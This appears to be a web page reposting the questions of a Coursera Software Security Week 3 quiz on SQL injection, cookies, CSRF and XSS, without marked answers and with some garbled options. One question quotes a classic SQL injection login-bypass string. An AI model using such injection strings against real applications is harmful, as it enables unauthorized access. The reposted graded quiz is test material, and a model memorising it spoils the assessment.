Coursera Answers

Software Security Week 3 Quiz Answer

Software Security Week 3 Quiz Answer

Software Security Week 3 Quiz Answer


In this article i am gone to share Coursera Course Software Security Week 3 Quiz Answer with you..

Week 3 Quiz


Question 1)
What is one difference between an HTTP GET and an HTTP POST request?
  • Only GET requests use the REFERER header
  • Only GET requests are subject to the same-origin policy
  • Only POST requests can encode parameters in the URL
  • Only POST requests may include parameter data in the request body


Question 2)
Which of the following is true about static and dynamic web content?
  • Static content may be re-generated with each request
  • Static pages may include PHP programs, which execute at the browser
  • The server often produces dynamic content based on the contents of the database
  • Javascript programs embedded in HTML pages are run server-side to produce dynamic content


Question 3)
SQL injection exploits a bug in what interaction of a web application?
  • Client to server
  • Network to server
  • Server to client
  • Server to database


Question 4)
SQL injection often allows an attacker to do which of the following?
  • Access information he shouldn’t
  • Overrun a buffer to smash the stack
  • Cause memory to be used after it’s freed
  • All of the above


Question 5)
If you had to summarize the key (most specific) programming failure with SQL injection, it would be:
  • Confusing data with code
  • Bypassing authentication
  • Trusting without verifying
  • Circumventing the same origin policy


Question 6)
What is escaping an example of?
  • Checking
  • Whitelisting
  • Blacklisting
  • Sanitization


Question 7)
Suppose a web application implements authentication by constructing an SQL query from HTML from data using PHP’s prepared statements. What would happen if an attacker entered FRANK’ OR 1=1; — in the web form’s user field?
  • The application will try to authenticate a user whose name is FRANK’ OR 1=1; —
  • The text will modify the structure of the SQL query and possibly bypass authentication
  • The text will be confused as the password and authentication will probably fail
  • The text will corrupt the query structure and the database will view it as a syntax error


Question 8)
Why is it undesirable to implement session identifiers using (only) hidden form fields?
  • Such fields cannot contain binary data
  • These fields are easily modified by the user
  • Such fields cannot include timeout information
  • The session ID is forgotten when the browser window is closed


Question 9)
Suppose a browser submits a GET request to URL http://www.mybank.com/accountinfo on 20 February 2015. Which of the following cookies, if already stored at the browser, would be sent with the request?
  • edition=us; expires=Wed, 18-Feb-2015; path=/; domain=.mybank.com
  • sessid=ABCDEFG; expires=Sat, 21-Feb-2015; path=/; domain=.mybank.com
  • lang=us-english; expires=Sat, 1-Aug-2015; path=/accountinfo/; domain=.fidelity.com
  • editon=us; expires=Thu, 19-Feb-2015; path=/accountinfo/prefs; domain=.mybank.com


Question 10)
Which of the following are ways that session cookies could be stolen or forged?
  • Stealing it from the password database
  • Reading a cookie from an unencrypted web request
  • Predicting the cookie’s structure and reconstructing it
  • Copying them by keylogging


Question 11)
Which of the following are ways to reduce the impact of a stolen cookies?
  • Associate the cookie with the client’s IP address
  • Giving each cookie a timeout
  • Changing a user’s cookie from session to session
  • Prevent cookies from entering the DNS cache
  • Stealing cookies frim from the password databas
  • Associate the cookie with the server’s IP address


Question 12)
How can the REFERER field be used to defend against CSRF attacks?
  • It ensures that requests only come from authenticated users
  • It can’t be used reliably because it only works for dynamic content
  • It can be used to check that a Javascript program is from the proper origin
  • It can be used to ensure that sensitive requests are (only) initiated by interaction with a site’s own pages


Question 13)
<script></script>tags in HTML pages most often identify programs written in what language?
  • PHP
  • C
  • Java
  • Javascript


Question 14)
The browser implements security for Javascript programs for what reason?
  • Such programs could deny service by running forever
  • It doesn’t — Javascript programs run at the server so the browser can ignore them
  • Such programs may access browser-controlled resources, which include potentially sensitive data in HTML documents and cookies
  • It doesn’t — these programs are only used to render dynamic content but are otherwise not security-relevant


Question 15)
XSS subverts what policy?
  • Whitelisting
  • Same Origin
  • Availability
  • Secure defaults


Question 16)
What is the difference between stored (or persistent) XSS and reflected XSS?
  • Stored XSS embeds Javascript in an a URL, while reflected XSS embeds it in a mirrored site
  • Stored XSS is amenable to blacklisting but reflected XSS is not
  • Stored XSS works by injecting code in a site’s served content, while reflected XSS injects code in a URL
  • Stored XSS works on database queries while reflected XSS works on cookies, which are received from and reflected back to the server